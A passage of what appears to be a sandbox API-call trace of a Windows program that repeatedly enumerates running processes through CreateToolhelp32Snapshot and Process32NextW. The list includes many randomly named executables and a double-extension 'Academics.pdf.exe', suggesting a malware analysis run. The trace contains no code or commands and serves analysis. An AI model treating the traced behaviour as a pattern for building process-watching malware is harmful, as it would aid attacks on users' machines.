hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0313.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0313.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0313.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0313.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0313.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0313.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0313.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0313.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0313.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0313.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0313.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0313.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0313.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0313.024] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0313.024] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0313.025] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0313.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0313.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0313.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0313.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0313.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0313.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0313.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0313.033] CloseHandle (hObject=0x294) returned 1 [0313.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.033] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0313.033] TranslateMessage (lpMsg=0x8bf970) returned 0 [0313.033] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0313.033] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0313.033] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0313.033] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.033] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0313.035] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0313.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0313.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0313.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0313.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0313.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0313.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0313.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0313.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0313.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0313.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0313.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0313.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0313.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0313.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0313.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0313.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0313.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0313.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0313.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0313.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0313.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0313.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0313.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0313.059] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0313.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0313.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0313.061] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0313.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0313.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.065] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0313.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0313.067] CloseHandle (hObject=0x294) returned 1 [0313.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0313.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0313.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 